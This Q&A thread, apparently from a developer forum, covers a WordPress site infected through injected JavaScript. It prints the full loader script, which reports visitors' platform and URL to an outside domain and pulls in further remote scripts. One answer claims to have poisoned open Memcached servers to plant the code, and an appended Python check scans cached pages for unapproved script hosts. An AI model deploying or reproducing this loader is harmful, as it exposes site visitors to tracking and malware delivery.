
In my WordPress site, I have this malicious code before "</body>":

<script src="https://fastjscdn.org/static.js?hash=a633f506a53746a846742c5655ebf596"></script>

The file static.js contains this:

window.__google__ads__show||(window.__google__ads__show="1",function(){if(function t(){try{return window.self!==window.top}catch(a){return!0}}()){var t,a,e=window.parent.document.createElement("script");e.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(e);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{}),t="https://fastjscdn.org/"+window.location.hostname.replace("www.","")+"/static.js",(a=document.createElement("script")).src=t,document.head.appendChild(a)}());

Before "fastjscdn .org", the malicious JS code was hosted on the domain name "asmr9999 .live". For the past few days, the domain has been changed to "fastjscdn .org".

How is it possible? How can it change the domain where it is hosted?

I am sure that WordPress, themes and plugins do not contain the malicious code. I didn't find anything in the database, including in base64-encoded form, for now.

Also, what does the code in the JS file do to my site?

I also found other people with the same malware as me, in a custom CMS; we cannot solve the problem in any way. More info here

2 Answers


    • You can use an online JavaScript beautifier tool to check the content of static.js: it seems to be injecting a script adapted to the platform, probably the same one that you mentioned in your other question, which will trigger the download of malware/adware
    • The reason why it could change the domain in the script is probably that your host is still infected; the domain was registered very recently, and was probably chosen because it looks less suspicious than the previous one
  1. It may be late, but let me tell the truth. The problem is the Memcached server you are using, which is public and has no password on the network. I made a script scanning the network and injecting this malicious code into every Memcached server. It's a "cache-side" XSS attack. Your server is safe. Configure your firewall and block connections from outside to port 11211, and everything will be OK.

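A check for the poisoned-cache symptom described in this thread, added here as an example and not code from either poster: it scans cached HTML values for `<script src>` hosts outside an allowlist, so it keeps flagging the injection when the hosting domain changes, as it did from asmr9999.live to fastjscdn.org. The cache keys, HTML values, script paths and allowlist are constructed; dumping the values out of your own cache is assumed to be done separately.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a fragment."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def foreign_script_hosts(html, allowed_hosts):
    """Return the sorted script hosts in html that the allowlist does not cover."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    found = set()
    for src in parser.sources:
        host = (urlparse(src).hostname or "").lower()
        if not host:
            continue  # relative URL: served from the site itself
        if not any(host == a or host.endswith("." + a) for a in allowed_hosts):
            found.add(host)
    return sorted(found)


def audit_cache(entries, allowed_hosts):
    """Map each cache key to the unexpected script hosts found in its value."""
    report = {}
    for key, value in entries.items():
        hosts = foreign_script_hosts(value, allowed_hosts)
        if hosts:
            report[key] = hosts
    return report


# Constructed sample data: keys, markup and allowlist are invented for illustration.
ALLOWED = {"example.com", "ajax.googleapis.com"}
SAMPLE_ENTRIES = {
    "page:/": '<body><script src="/wp-includes/js/jquery.js"></script>'
              '<script src="https://fastjscdn.org/static.js"></script></body>',
    "page:/old": '<body><script src="//asmr9999.live/x.js"></script></body>',
    "page:/ok": '<body><script src="https://ajax.googleapis.com/j.js"></script></body>',
}
```

An allowlist is used instead of a blocklist because the thread shows the injected domain being swapped; any key reported by `audit_cache` should be purged after the port is closed.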